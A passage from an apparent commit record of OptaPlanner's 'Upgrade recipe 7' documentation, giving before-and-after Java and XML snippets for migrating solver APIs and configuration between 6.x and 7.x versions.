`<threadFactoryClass>` element,\nthe `<threadFactoryClass>` element under `<partitionedSearch>` has been deprecated.\n\nBefore in `*SolverConfig.xml` and `*BenchmarkConfig.xml`:\n[source, xml]\n----\n <solver>\n ...\n <partitionedSearch>\n <threadFactoryClass>...MyAppServerThreadFactory<\/threadFactoryClass>\n ...\n <\/partitionedSearch>\n <\/solver>\n----\n\nAfter in `*SolverConfig.xml` and `*BenchmarkConfig.xml`:\n[source, xml]\n----\n <solver>\n <threadFactoryClass>...MyAppServerThreadFactory<\/threadFactoryClass>\n ...\n <partitionedSearch>\n ...\n <\/partitionedSearch>\n <\/solver>\n----\n\n\n[.upgrade-recipe-minor]\n=== `ConstraintMatchTotal` and `Indictment`: `getScoreTotal()` renamed to `getScore()`\n\nThe `getScoreTotal()` methods on `ConstraintMatchTotal` and `Indictment`\nhave been deprecated and replaced by `getScore()`.\nThose deprecated methods will be removed in 8.0.\n\nBefore in `*.java`:\n[source, java]\n----\nScore score = constraintMatchTotal.getScoreTotal();\n----\n\nAfter in `*.java`:\n[source, java]\n----\nScore score = constraintMatchTotal.getScore();\n----\n\nBefore in `*.java`:\n[source, java]\n----\nScore score = indictment.getScoreTotal();\n----\n\nAfter in `*.java`:\n[source, java]\n----\nScore score = indictment.getScore();\n----\n\n\n[.upgrade-recipe-minor]\n=== `IndictmentScoreTotalComparator` renamed to `IndictmentScoreComparator`\n\nThe comparator `IndictmentScoreTotalComparator` has been deprecated\nand replaced by `IndictmentScoreComparator`.\nThe deprecated class will be removed in 8.0.\n\n\nBefore in `*.java`:\n[source, java]\n----\nindictmentList.sort(new IndictmentScoreTotalComparator());\n----\n\nAfter in `*.java`:\n[source, java]\n----\nindictmentList.sort(new IndictmentScoreComparator());\n----\n\n\n== From 7.11.0.Final to 7.12.0.Final\n\n\n[.upgrade-recipe-major]\n=== Chained ChangeMove: cache type `PHASE` no longer supported\n\nTo work correctly with multithreaded solving,\n`ChainedChangeMove` and `ChainedSwapMove` aren't `PHASE` cacheable any longer.\n\nBefore in `*SolverConfig.xml` and `*BenchmarkConfig.xml`:\n[source, xml]\n----\n <changeMoveSelector><!-- On at least 1 chained variable -->\n <cacheType>PHASE<\/cacheType>\n ...\n <\/changeMoveSelector>\n----\n\nAfter in `*SolverConfig.xml` and `*BenchmarkConfig.xml`:\n[source, xml]\n----\n <changeMoveSelector>\n <cacheType>STEP<\/cacheType>\n ...\n <\/changeMoveSelector>\n----\n","old_contents":"= Upgrade recipe 7\n:awestruct-description: Upgrade to OptaPlanner 7 from a previous version.\n:awestruct-layout: upgradeRecipeBase\n:awestruct-priority: 0.5\n:awestruct-upgrade_recipe_version: 7\n\n\n== From 6.5.0.Final to 7.0.0.Beta1\n\n=== Backwards incompatible changes to the public API in 7.0\n\nBecause this is a new major version number (7.0), which is the foundation for the 7.x series for the next few years,\nit allows us to make backwards incompatible changes to the public API _for the long term benefit of this project_.\n\nWe kept these backwards incompatible changes to a strict minimum\n(by favoring deprecation over removal) and will not introduce any additional ones during the 7.x era.\n\nAny backwards incompatible changes are annotated with a [.label.label-danger.label-as-badge.label-public-api]#Public API# badge.\n\n\n[.upgrade-recipe-major.upgrade-recipe-public-api]\n=== Java 8 or higher required\n\nIf you're using JRE or JDK 6 or 7, upgrade to JDK 8 or higher.\n\nWe currently intend to support a minimal version of Java 8 throughout the entire 7.x series.\n\n\n[.upgrade-recipe-minor.upgrade-recipe-public-api]\n=== Deprecated methods removed\n\nThe following long term deprecated methods have been finally removed:\n\n* Setters on `ScoreHolder` implementations, such as `HardSoftScoreHolder.setHardScore(int)` and `setSoftScore(int)`.\nUse `addHardConstraintMatch(...)` and `addSoftConstraintMatch(...)` in your score rules instead.\nSee link:.\/upgradeRecipe6.0.html[this upgrade recipe].\n\n* The experimental, deprecated, hybrid metaheuristic called `LATE_SIMULATED_ANNEALING`\n(which was inspired by both Late Acceptance and Simulated Annealing) has been removed.\n\n* The dead, deprecated code of `DeciderScoreComparatorFactory` has been removed.\nSee link:.\/upgradeRecipe6.2.html[this upgrade recipe].\n\n* The deprecated `SolverBenchmarkBluePrintType.ALL_CONSTRUCTION_HEURISTIC_TYPES` has been removed.\nSee link:.\/upgradeRecipe6.3.html[this upgrade recipe].\n\n\n[.upgrade-recipe-major]\n=== `Solution` interface removed (deprecated)\n\nYour solution class no longer needs to have both the `@PlanningSolution` annotation and implement the `Solution` interface,\nonly the annotation suffices. The `Solution` interface has been deprecated and will be removed in a future version.\n\nRemove the `Solution` interface, annotate the `getScore()` method with `@PlanningScore`\nand replace the `getProblemFacts()` method with a `@ProblemFactCollectionProperty` annotation directly on every problem fact getter (or field).\n\nBefore in `*.java`:\n[source, java]\n----\n@PlanningSolution\npublic class CloudBalance implements Solution<HardSoftScore> {\n\n private List<CloudComputer> computerList;\n ...\n\n private HardSoftScore score;\n\n @ValueRangeProvider(id = \"computerRange\")\n public List<CloudComputer> getComputerList() {...}\n\n public HardSoftScore getScore() {...}\n public void setScore(HardSoftScore score) {...}\n\n public Collection<? extends Object> getProblemFacts() {\n List<Object> facts = new ArrayList<Object>();\n facts.addAll(computerList);\n ...\n return facts;\n }\n\n}\n----\n\nAfter in `*.java`:\n[source, java]\n----\n@PlanningSolution\npublic class CloudBalance {\n\n private List<CloudComputer> computerList;\n ...\n\n private HardSoftScore score;\n\n @ValueRangeProvider(id = \"computerRange\")\n @ProblemFactCollectionProperty\n public List<CloudComputer> getComputerList() {...}\n\n @PlanningScore\n public HardSoftScore getScore() {...}\n public void setScore(HardSoftScore score) {...}\n\n}\n----\n\nFor a single problem fact (which is not wrapped in a `Collection`), use the `@ProblemFactProperty` annotation,\nas shown below (with field annotations this time).\n\nBefore in `*.java`:\n[source, java]\n----\n@PlanningSolution\npublic class CloudBalance implements Solution<HardSoftScore> {\n\n private CloudParametrization parametrization;\n private List<CloudBuilding> buildingList;\n @ValueRangeProvider(id = \"computerRange\")\n private List<CloudComputer> computerList;\n ...\n\n public Collection<? extends Object> getProblemFacts() {\n List<Object> facts = new ArrayList<Object>();\n facts.add(parametrization); \/\/ not a Collection\n facts.addAll(buildingList);\n facts.addAll(computerList);\n ...\n return facts;\n }\n\n}\n----\n\nAfter in `*.java`:\n[source, java]\n----\n@PlanningSolution\npublic class CloudBalance {\n\n @ProblemFactProperty\n private CloudParametrization parametrization;\n @ProblemFactCollectionProperty\n private List<CloudBuilding> buildingList;\n @ValueRangeProvider(id = \"computerRange\")\n @ProblemFactCollectionProperty\n private List<CloudComputer> computerList;\n ...\n\n}\n----\n\nDon't add the `@ProblemFactCollectionProperty` annotation on getters (or fields)\nthat have a `@PlanningEntityCollectionProperty` annotation.\n\n\n[.upgrade-recipe-minor.upgrade-recipe-public-api]\n=== `Solver`: return values no longer implement `Solution`\n\nBecause the `Solution` interface was deprecated (see the section below to upgrade from 6.4.0.Final to 7.0.0.Beta1),\nthe `Solver.solve(...)` and `Solver.getBestSolution()` methods now return an `Object` instead of a `Solution` instance\n(if and only if no type parameter is specified for the `Solver`).\n\n*This only applies if you're still using a `Solver` without a type parameter\nand if you're not casting the return value immediately to your solution implementation (which is unlikely).*\n\nBefore in `*.java`:\n[source, java]\n----\nSolution s = solver.solve(problem);\nCloudBalance solution = (CloudBalance) s;\n----\n\nAfter in `*.java` (quick and dirty fix):\n[source, java]\n----\nCloudBalance solution = (CloudBalance) solver.solve(problem);\n----\n\nAfter in `*.java` (recommended fix):\n[source, java]\n----\nSolverFactory<CloudBalance> factory = SolverFactory.createFromXmlResource(...);\nSolver<CloudBalance> solver = factory.buildSolver();\n...\nCloudBalance solution = solver.solve(problem);\n----\n\n\n[.upgrade-recipe-minor.upgrade-recipe-public-api]\n=== `BestSolutionChangedEvent.getNewBestSolution()`: return value no longer implements `Solution`\n\nBecause the `Solution` interface was deprecated (see the section below to upgrade from 6.4.0.Final to 7.0.0.Beta1),\nthe `BestSolutionChangedEvent.getNewBestSolution()` method now returns an `Object`\n(if and only if no type parameter is specified for the `SolverEventListener`).\n\n*This only applies if you're still using a `SolverEventListener` without a type parameter\nand if you're not casting the return value immediately to your solution implementation (which is unlikely).*\n\nBefore in `*.java`:\n[source, java]\n----\nSolverFactory factory = SolverFactory.createFromXmlResource(...);\nSolver solver = factory.buildSolver();\nsolver.addEventListener(new SolverEventListener() {\n @Override\n public void bestSolutionChanged(BestSolutionChangedEvent event) {\n Solution s = event.getNewBestSolution();\n CloudBalance solution = (CloudBalance) s;\n ...\n }\n});\n----\n\nAfter in `*.java`:\n[source, java]\n----\nSolverFactory<CloudBalance> factory = SolverFactory.createFromXmlResource(...);\nSolver<CloudBalance> solver = factory.buildSolver();\nsolver.addEventListener(new SolverEventListener<CloudBalance>() {\n @Override\n public void bestSolutionChanged(BestSolutionChangedEvent<CloudBalance> event) {\n CloudBalance solution = event.getNewBestSolution();\n ...\n }\n});\n----\n\nAnd you'll probably want to use a lambda here:\n\n[source, java]\n----\nSolverFactory<CloudBalance> factory = SolverFactory.createFromXmlResource(...);\nSolver<CloudBalance> solver = factory.buildSolver();\nsolver.addEventListener(event -> {\n CloudBalance solution = event.getNewBestSolution();\n ...\n});\n----\n\n\n[.upgrade-recipe-major]\n=== `SolutionFileIO`: added optional generic type parameter\n\nTo avoid the awkward cast to your `Solution` implementation and to get rid of that deprecated interface,\n`SolutionFileIO` now optionally supports a generic type parameter (which is the solution class).\n\nBefore in `*.java`:\n[source, java]\n----\npublic class TspFileIO implements SolutionFileIO {\n ...\n\n public Solution read(File inputSolutionFile) {...}\n\n public void write(Solution solution, File outputSolutionFile) {\n TspSolution tspSolution = (TspSolution) solution;\n ...\n }\n\n}\n----\n\nAfter in `*.java`:\n[source, java]\n----\npublic class TspFileIO implements SolutionFileIO<TspSolution> {\n ...\n\n public TspSolution read(File inputSolutionFile) {...}\n\n public void write(TspSolution tspSolution, File outputSolutionFile) {\n ...\n }\n\n}\n----\n\n\n[.upgrade-recipe-minor]\n=== `XStreamSolutionFileIO`: added optional generic type parameter\n\nTo avoid the awkward cast to your `Solution` implementation and to get rid of that deprecated interface,\n`XStreamSolutionFileIO` now optionally supports a generic type parameter (which is the solution class).\n\nBefore in `*.java`:\n[source, java]\n----\nSolutionFileIO solutionFileIO = new XStreamSolutionFileIO(CloudBalance.class);\n----\n\nAfter in `*.java`:\n[source, java]\n----\nSolutionFileIO<CloudBalance> solutionFileIO = new XStreamSolutionFileIO<>(CloudBalance.class);\n----\n\n\n[.upgrade-recipe-minor]\n=== `SelectionFilter`: added generic type parameter\n\nTo avoid the awkward cast to your `Solution` implementation,\na `SelectionFilter` now also has a generic type parameter for the solution, not just the selection type.\n\nBefore in `*.java`:\n[source, java]\n----\npublic class LectureFilter implements SelectionFilter<Lecture> {\n\n public boolean accept(ScoreDirector scoreDirector, Lecture lecture) {\n ...\n }\n\n}\n----\n\nAfter in `*.java`:\n[source, java]\n----\npublic class LectureFilter implements SelectionFilter<CourseSchedule, Lecture> {\n\n @Override\n public boolean accept(ScoreDirector<CourseSchedule> scoreDirector, Lecture lecture) {\n ...\n }\n\n}\n----\n\n\n[.upgrade-recipe-minor]\n=== `CustomPhaseCommand`: added optional generic type parameter\n\nTo avoid the awkward cast to your `Solution` implementation and to get rid of that deprecated interface,\n`CustomPhaseCommand` now optionally supports a generic type parameter (which is the solution class).\n\nBefore in `*.java`:\n[source, java]\n----\npublic class DinnerPartySolutionInitializer extends AbstractCustomPhaseCommand {\n\n public void changeWorkingSolution(ScoreDirector scoreDirector) {\n DinnerParty dinnerParty = (DinnerParty) scoreDirector.getWorkingSolution();\n ...\n }\n\n}\n----\n\nAfter in `*.java`:\n[source, java]\n----\npublic class DinnerPartySolutionInitializer extends AbstractCustomPhaseCommand<DinnerParty> {\n\n public void changeWorkingSolution(ScoreDirector<DinnerParty> scoreDirector) {\n DinnerParty dinnerParty = scoreDirector.getWorkingSolution();\n ...\n }\n\n}\n----\n\n\n[.upgrade-recipe-major]\n=== `ProblemFactChange`: added optional generic type parameter\n\nTo avoid the awkward cast to your `Solution` implementation and to get rid of that deprecated interface,\n`ProblemFactChange` now optionally supports a generic type parameter (which is the solution class).\n\nBefore in `*.java`:\n[source, java]\n----\n solver.addProblemFactChange(new ProblemFactChange() {\n public void doChange(ScoreDirector scoreDirector) {\n CloudBalance cloudBalance = (CloudBalance) scoreDirector.getWorkingSolution();\n ...\n }\n });\n----\n\nAfter in `*.java`:\n[source, java]\n----\n solver.addProblemFactChange(new ProblemFactChange<CloudBalance>() {\n public void doChange(ScoreDirector<CloudBalance> scoreDirector) {\n CloudBalance cloudBalance = scoreDirector.getWorkingSolution();\n ...\n }\n });\n----\n\nAfter in `*.java` (with lambda):\n[source, java]\n----\n solver.addProblemFactChange(scoreDirector -> {\n CloudBalance cloudBalance = scoreDirector.getWorkingSolution();\n ...\n });\n----\n\n\n[.upgrade-recipe-minor]\n=== `Bendable*Score`: `toString()` changed\n\nA bendable score (`BendableScore`, `BendableLongScore` or `BendableBigDecimalScore`)'s `String`\nhas changed so it can be parsed without the ScoreDefinition.\n\nBefore in `*SolverConfig.xml` and `*BenchmarkConfig.xml`:\n[source, xml]\n----\n <termination>\n <bestScoreLimit>0\/0\/-1\/-2\/-3<\/bestScoreLimit>\n <\/termination>\n----\n\nAfter in `*SolverConfig.xml` and `*BenchmarkConfig.xml`:\n[source, xml]\n----\n <termination>\n <bestScoreLimit>[0\/0]hard\/[-1\/-2\/-3]soft<\/bestScoreLimit>\n <\/termination>\n----\n\nBefore in XStream `*.xml` output with `optaplanner-persistence-xstream`:\n[source, xml]\n----\n <score>0\/0\/-1\/-2\/-3<\/score>\n----\n\nAfter in in XStream `*.xml` output with `optaplanner-persistence-xstream`:\n[source, xml]\n----\n <score>[0\/0]hard\/[-1\/-2\/-3]soft<\/score>\n----\n\n\n[.upgrade-recipe-major]\n=== `EnvironmentMode`: `PRODUCTION` renamed\n\nThe `EnvironmentMode` `PRODUCTION` has been renamed to `NON_REPRODUCIBLE`\nbecause most enterprises use `REPRODUCIBLE` in production and that's fine.\nFor backwards compatibility, `PRODUCTION` still exists, but it's deprecated and it will be removed in a future version.\n\nBefore in `*SolverConfig.xml` and `*BenchmarkConfig.xml`:\n[source, xml]\n----\n<solver>\n <environmentMode>PRODUCTION<\/environmentMode>\n ...\n<\/solver>\n----\n\nAfter in `*SolverConfig.xml` and `*BenchmarkConfig.xml`:\n[source, xml]\n----\n<solver>\n <environmentMode>NON_REPRODUCIBLE<\/environmentMode>\n ...\n<\/solver>\n----\n\n\n[.upgrade-recipe-readme]\n=== Average calculate count renamed to score calculation speed\n\nIn the logs and the benchmark report, the _average calculate count per second_ has been renamed to _score calculation speed_.\n\n\n[.upgrade-recipe-minor]\n=== `Termination`: `calculateCountLimit` renamed\n\nThe termination configuration property `calculateCountLimit` has been renamed to `scoreCalculationCountLimit`.\nThe property `calculateCountLimit` has been deprecated and will be removed in a future version.\n\nBefore in `*SolverConfig.xml` and `*BenchmarkConfig.xml`:\n[source, xml]\n----\n <termination>\n <calculateCountLimit>100000<\/calculateCountLimit>\n <\/termination>\n----\n\nAfter in `*SolverConfig.xml` and `*BenchmarkConfig.xml`:\n[source, xml]\n----\n <termination>\n <scoreCalculationCountLimit>100000<\/scoreCalculationCountLimit>\n <\/termination>\n----\n\n\n[.upgrade-recipe-minor]\n=== `ProblemStatisticType`: `CALCULATE_COUNT_PER_SECOND` renamed\n\nThe benchmark ProblemStatisticType `CALCULATE_COUNT_PER_SECOND` has been renamed to `SCORE_CALCULATION_SPEED`.\n\nBefore in `*BenchmarkConfig.xml`:\n[source, xml]\n----\n <problemStatisticType>CALCULATE_COUNT_PER_SECOND<\/problemStatisticType>\n----\n\nAfter in `*BenchmarkConfig.xml`:\n[source, xml]\n----\n <problemStatisticType>SCORE_CALCULATION_SPEED<\/problemStatisticType>\n----\n\n\n[.upgrade-recipe-readme]\n=== `Score`: uninitialized variable count\n\nA solution's `Score` now also contains the number of uninitialized variables (usually `0`) as a negative `getInitScore()`.\nThis is useful in exotic cases with multiple phases to fully initialize a solution.\nIt also prevents bugs in multithreaded use cases.\n\nWith `Score.isSolutionInitialized()`, it's now possible to quickly and reliably determine if a solution is fully initialized.\nThe method `FeasibilityScore.isFeasible()` now also checks if the solution was fully initialized during score calculation.\n\n\n[.upgrade-recipe-major.upgrade-recipe-reverted]\n=== `EasyScoreCalculator`: `calculateScore()` changed\n\n*This change has been reverted in version 7.0.0.Beta6. Ignore this item if you're upgrading directly to that version or higher.*\n\nThe `EasyScoreCalculator` interface method `calculateScore(solution)` has been changed to `calculateScore(solution, initScore)`.\nChange the method signature to add the `initScore` and then pass it to the `Score.valueOf()` method.\n\nBefore in `*.java`:\n[source, java]\n----\npublic class CloudBalancingEasyScoreCalculator implements EasyScoreCalculator<CloudBalance> {\n\n public HardSoftScore calculateScore(CloudBalance cloudBalance) {\n ...\n return HardSoftScore.valueOf(hardScore, softScore);\n }\n\n}\n----\n\nAfter in `*.java`:\n[source, java]\n----\npublic class CloudBalancingEasyScoreCalculator implements EasyScoreCalculator<CloudBalance> {\n\n public HardSoftScore calculateScore(CloudBalance cloudBalance, int initScore) {\n ...\n return HardSoftScore.valueOf(initScore, hardScore, softScore);\n }\n\n}\n----\n\nOptaPlanner keeps track of the `initScore` internally, but it needs to be passed into the `Score` creation because a `Score` is immutable by design.\n\n\n[.upgrade-recipe-minor.upgrade-recipe-reverted]\n=== `IncrementalScoreCalculator`: `calculateScore()` changed\n\n*This change has been reverted in version 7.0.0.Beta6. Ignore this item if you're upgrading directly to that version or higher.*\n\nThe `IncrementalScoreCalculator` interface method `calculateScore()` has been changed to `calculateScore(initScore)`.\nChange the method signature to add the `initScore` and then pass it to the `Score.valueOf()` method.\n\nBefore in `*.java`:\n[source, java]\n----\npublic class CloudBalancingIncrementalScoreCalculator extends AbstractIncrementalScoreCalculator<CloudBalance> {\n\n public HardSoftScore calculateScore() {\n return HardSoftScore.valueOf(hardScore, softScore);\n }\n\n}\n----\n\nAfter in `*.java`:\n[source, java]\n----\npublic class CloudBalancingIncrementalScoreCalculator extends AbstractIncrementalScoreCalculator<CloudBalance> {\n\n public HardSoftScore calculateScore(int initScore) {\n return HardSoftScore.valueOf(initScore, hardScore, softScore);\n }\n\n}\n----\n\n\n[.upgrade-recipe-major.upgrade-recipe-public-api.upgrade-recipe-reverted]\n=== `Score`: `valueOf(...)` changed and `valueOfInitialized(...)` added\n\n*This change has been reverted in version 7.0.0.Beta6. Ignore this item if you're upgrading directly to that version or higher.\nInstead, the method `valueOfUninitialized(...)` has been added, but that doesn't affect your code.*\n\nEach `Score` implementation now requires an `initScore` parameter.\nInside a `ScoreCalculator`, the `initScore` must be passed from the `calculateScore()` method (see the 2 previous notes above).\n\nOutside of a `ScoreCalculator`, if you're constructing a score for an initialized solution,\njust replace `valueOf()` with `valueOfInitialized()`:\n\nBefore in `*.java`:\n[source, java]\n----\n SimpleScore score = SimpleScore.valueOf(1234);\n----\n\nAfter in `*.java`:\n[source, java]\n----\n SimpleScore score = SimpleScore.valueOfInitialized(1234);\n----\n\nOr with a `HardSoftScore`:\n\nBefore in `*.java`:\n[source, java]\n----\n HardSoftScore score = HardSoftScore.valueOf(1200, 34);\n----\n\nAfter in `*.java`:\n[source, java]\n----\n HardSoftScore score = HardSoftScore.valueOfInitialized(1200, 34);\n----\n\nIt is intentional that `valueOfInitialized()` doesn't just overload `valueOf()`,\nto avoid that an `EasyScoreCalculator` implementation forgets to pass the `initScore` parameter.\n\n\n[.upgrade-recipe-major]\n=== `BestSolutionChangedEvent`: `isNewBestSolutionInitialized()` replaced\n\nThe method `BestSolutionChangedEvent.isNewBestSolutionInitialized()`\nhas been deprecated in favor of `BestSolutionChangedEvent.getNewBestSolution().getScore().isSolutionInitialized()`.\n\nBefore in `*.java`:\n[source, java]\n----\n public void bestSolutionChanged(BestSolutionChangedEvent<CloudBalance> event) {\n if (event.isEveryProblemFactChangeProcessed()\n && event.isNewBestSolutionInitialized()) {\n ...\n }\n }\n----\n\nAfter in `*.java`:\n[source, java]\n----\n public void bestSolutionChanged(BestSolutionChangedEvent<CloudBalance> event) {\n if (event.isEveryProblemFactChangeProcessed()\n && event.getNewBestSolution().getScore().isSolutionInitialized()) {\n ...\n }\n }\n----\n\nHowever, if you also check `isFeasible()`, that's enough because it now also checks if the solution is initialized.\n\nAfter in `*.java` for a `FeasibleScore`:\n[source, java]\n----\n public void bestSolutionChanged(BestSolutionChangedEvent<CloudBalance> event) {\n if (event.isEveryProblemFactChangeProcessed()\n \/\/ isFeasible() checks isSolutionInitialized() too\n && event.getNewBestSolution().getScore().isFeasible()) {\n ...\n }\n }\n----\n\n\n[.upgrade-recipe-minor.upgrade-recipe-reverted]\n=== Custom initializer: `Score.compareTo()` behaviour changed\n\n*This change has been reverted in version 7.0.0.Beta6. Ignore this item if you're upgrading directly to that version or higher.*\n\nThe `Score.compareTo()` now also takes the uninitialized variable count into account.\nIf you have a `CustomPhaseCommand` that implements a custom solution initializer (instead of using a Construction Heuristic),\nit will need to transform all scores with `Score.toInitializedScore()` before comparison to avoid making the wrong decision:\n\nBefore in `*.java`:\n[source, java]\n----\npublic class DinnerPartySolutionInitializer extends AbstractCustomPhaseCommand<DinnerParty> {\n ...\n\n private void initializeSeatDesignationList(ScoreDirector<DinnerParty> scoreDirector, DinnerParty dinnerParty) {\n ...\n for (SeatDesignation seatDesignation : dinnerParty.getSeatDesignationList()) {\n Score bestScore = SimpleScore.valueOf(Integer.MIN_VALUE);\n ...\n for (Seat seat : undesignatedSeatList) {\n ...\n if (score.compareTo(bestScore) > 0) {\n bestScore = score;\n ...\n }\n }\n ...\n }\n }\n\n}\n----\n\nAfter in `*.java`:\n[source, java]\n----\npublic class DinnerPartySolutionInitializer extends AbstractCustomPhaseCommand<DinnerParty> {\n ...\n\n private void initializeSeatDesignationList(ScoreDirector<DinnerParty> scoreDirector, DinnerParty dinnerParty) {\n ...\n for (SeatDesignation seatDesignation : dinnerParty.getSeatDesignationList()) {\n Score bestScore = SimpleScore.valueOfInitialized(Integer.MIN_VALUE);\n ...\n for (Seat seat : undesignatedSeatList) {\n ...\n if (score.toInitializedScore().compareTo(bestScore.toInitializedScore()) > 0) {\n bestScore = score;\n ...\n }\n }\n ...\n }\n }\n\n}\n----\n\n\n[.upgrade-recipe-minor]\n=== `Score` and `ScoreDefinition`: methods changed\n\nThe `ScoreDefinition.fromLevelNumbers(...)` method now requires an `initScore` parameter.\n\nBefore in `*.java`:\n[source, java]\n----\nScore score = scoreDefinition.fromLevelNumbers(new int[]{0, -200});\n----\n\nAfter in `*.java` (quick and dirty fix):\n[source, java]\n----\nScore score = scoreDefinition.fromLevelNumbers(0, new int[]{0, -200});\n----\n\n\n[.upgrade-recipe-minor]\n=== Custom `Score`: methods added\n\nIf you have a custom `Score`:\nThe `Score` interface has several new methods: `getInitScore()`, `isSolutionInitialized()`, `toInitializedScore()` and `withInitScore()`.\nThe first two methods are implemented by `AbstractScore`, but the last two methods need to be specifically implemented.\n\nBefore in `*.java`:\n[source, java]\n----\npublic final class HardSoftScore extends AbstractScore<HardSoftScore> ... {\n ...\n}\n----\n\nAfter in `*.java`:\n[source, java]\n----\npublic final class HardSoftScore extends AbstractScore<HardSoftScore> ... {\n ...\n\n public HardSoftScore toInitializedScore() {\n return initScore == 0 ? this : new HardSoftScore(0, hardScore, softScore);\n }\n\n public HardSoftScore withInitScore(int newInitScore) {\n assertNoInitScore();\n return new HardSoftScore(newInitScore, hardScore, softScore);\n }\n\n}\n----\n\nFurthermore, a score that implements `FeasibleScore` needs to take the `initScore` into account in the `isFeasible()` method implementation.\n\n\n[.upgrade-recipe-minor]\n=== Hibernate integration: extra `@Column` needed\n\nBecause a `Score` now also contains an `initScore` of type `int` (regardless of the type of the other fields),\nadd an extra `@Column` annotation to the beginning of the `@Columns` list to map that field to a database column.\n\nSet it to `0` for all existing records (unless you have reason to believe that some scores weren't calculated on a fully initialized solution).\n\nBefore in `*.java`:\n[source, java]\n----\n @Columns(columns = {\n @Column(name = \"hardScore\"),\n @Column(name = \"softScore\")})\n public HardSoftScore getScore() {\n return score;\n }\n----\n\nAfter in `*.java`:\n[source, java]\n----\n @Columns(columns = {\n @Column(name = \"initScore\"),\n @Column(name = \"hardScore\"),\n @Column(name = \"softScore\")})\n public HardSoftScore getScore() {\n return score;\n }\n----\n\n\n[.upgrade-recipe-impl-detail]\n=== `XStreamSolutionFileIO`: no-arg constructor removed\n\nThe no-arg constructor of `XStreamSolutionFileIO` has been removed because it's useless.\n\n\n[.upgrade-recipe-minor]\n=== JAXB support added\n\nIf you're using JAXB, take advantage the new JAXB Score bindings etc.\nSee the reference manual, chapter _Integration_.\n\nThese new `ScoreJaxbXmlAdapter` implementations have been promoted to the public API,\nso they are guaranteed to be backwards compatible in future versions.\n\n\n[.upgrade-recipe-minor]\n=== Jackson support added\n\nIf you're using Jackson, take advantage the new Jackson Score bindings etc.\nSee the reference manual, chapter _Integration_.\n\nThese new `ScoreJacksonJsonSerializer` and `ScoreJacksonJsonDeserializer` implementations have been promoted to the public API,\nso they are guaranteed to be backwards compatible in future versions.\n\n\n[.upgrade-recipe-major]\n=== `XStreamScoreConverter` replaced\n\nThe general purpose `XStreamScoreConverter` to bind `Score` implementations\nhas been replaced by specific implementations, such as `HardSoftScoreXStreamConverter` and `SimpleScoreXStreamConverter`\nthat are easier to use.\n\nFurthermore, these new `ScoreXStreamConverter` implementations have been promoted to the public API,\nso they are now guaranteed to be backwards compatible in future versions.\n\nBefore in `*.java`:\n[source, java]\n----\npublic class CloudBalance {\n\n @XStreamConverter(value = XStreamScoreConverter.class, types = {HardSoftScoreDefinition.class})\n private HardSoftScore score;\n\n ...\n}\n----\n\nAfter in `*.java`:\n[source, java]\n----\npublic class CloudBalance {\n\n @XStreamConverter(HardSoftScoreXStreamConverter.class)\n private HardSoftScore score;\n\n ...\n}\n----\n\nFor a bendable score, it's no longer needed to configure the `hardLevelSize` and `softLevelSize`.\n\nBefore in `*.java`:\n[source, java]\n----\npublic class Schedule {\n\n @XStreamConverter(value = XStreamScoreConverter.class, types = {BendableScoreDefinition.class}, ints = {1, 2})\n private BendableScore score;\n\n ...\n}\n----\n\nAfter in `*.java`:\n[source, java]\n----\npublic class Schedule {\n\n @XStreamConverter(BendableScoreXStreamConverter.class)\n private BendableScore score;\n\n ...\n}\n----\n\n\n[.upgrade-recipe-major.upgrade-recipe-public-api]\n=== `@CustomShadowVariable`: `sources` type changed\n\nA shadow variable annotated with `@CustomShadowVariable`\nnow expects that the `sources` parameter is of type `@PlanningVariableReference`\ninstead of `@CustomShadowVariable.Source`.\n\nThis way it's consistent with the `variableListenerRef` parameter.\n\nBefore in `*.java`:\n[source, java]\n----\n @CustomShadowVariable(variableListenerClass = ArrivalTimeUpdatingVariableListener.class,\n sources = {@CustomShadowVariable.Source(variableName = \"previousStandstill\")})\n public Long getArrivalTime() {\n return arrivalTime;\n }\n----\n\nAfter in `*.java`:\n[source, java]\n----\n @CustomShadowVariable(variableListenerClass = ArrivalTimeUpdatingVariableListener.class,\n sources = {@PlanningVariableReference(variableName = \"previousStandstill\")})\n public Long getArrivalTime() {\n return arrivalTime;\n }\n----\n\n\n== From 7.0.0.Beta1 to 7.0.0.Beta2\n\n[.upgrade-recipe-minor]\n=== `ProblemFactChange`: `before\/afterProblemFactChanged` renamed\n\nThe `ScoreDirector` methods `beforeProblemFactChanged()` and `afterProblemFactChanged()`\nhave been renamed to `beforeProblemPropertyChanged()` and `afterProblemPropertyChanged()`.\nThis can affect your `ProblemFactChange` implementations.\n\nA problem fact is a class that doesn't change during planning.\nA problem property is a property on a problem fact or a planning entity that doesn't change during planning\n(so it's not a planning variable).\n\nBefore in `*.java`:\n[source, java]\n----\n scoreDirector.beforeProblemFactChanged(computer);\n computer.setMemory(newMemoryCapacity);\n scoreDirector.afterProblemFactChanged(computer);\n----\n\nAfter in `*.java`:\n[source, java]\n----\n scoreDirector.beforeProblemPropertyChanged(computer);\n computer.setMemory(newMemoryCapacity);\n scoreDirector.afterProblemPropertyChanged(computer);\n----\n\n\n[.upgrade-recipe-major]\n=== Solver configuration: `<scoreDefinitionType>` removed\n\nDon't specify the `scoreDefinitionType` in the solver configuration any more\nbecause OptaPlanner will now figure it out automatically from the domain.\n\nBefore in `*SolverConfig.xml` and `*BenchmarkConfig.xml`:\n[source, xml]\n----\n <scoreDirectorFactory>\n <scoreDefinitionType>HARD_SOFT<\/scoreDefinitionType>\n <scoreDrl>org\/optaplanner\/examples\/cloudbalancing\/solver\/cloudBalancingScoreRules.drl<\/scoreDrl>\n <\/scoreDirectorFactory>\n----\n\nAfter in `*SolverConfig.xml` and `*BenchmarkConfig.xml`:\n[source, xml]\n----\n <scoreDirectorFactory>\n <scoreDrl>org\/optaplanner\/examples\/cloudbalancing\/solver\/cloudBalancingScoreRules.drl<\/scoreDrl>\n <\/scoreDirectorFactory>\n----\n\nFor a bendable score, also move the `bendableHardLevelsSize` and `bendableSoftLevelsSize` lines from the solver configuration XML\ninto the `@PlanningScore` annotation on your domain class.\n\nBefore in `*SolverConfig.xml` and `*BenchmarkConfig.xml`:\n[source, xml]\n----\n <scoreDirectorFactory>\n <scoreDefinitionType>BENDABLE<\/scoreDefinitionType>\n <bendableHardLevelsSize>1<\/bendableHardLevelsSize>\n <bendableSoftLevelsSize>2<\/bendableSoftLevelsSize>\n <scoreDrl>org\/optaplanner\/examples\/projectjobscheduling\/solver\/projectJobSchedulingScoreRules.drl<\/scoreDrl>\n <\/scoreDirectorFactory>\n----\n\nAfter in `*SolverConfig.xml` and `*BenchmarkConfig.xml`:\n[source, xml]\n----\n <scoreDirectorFactory>\n 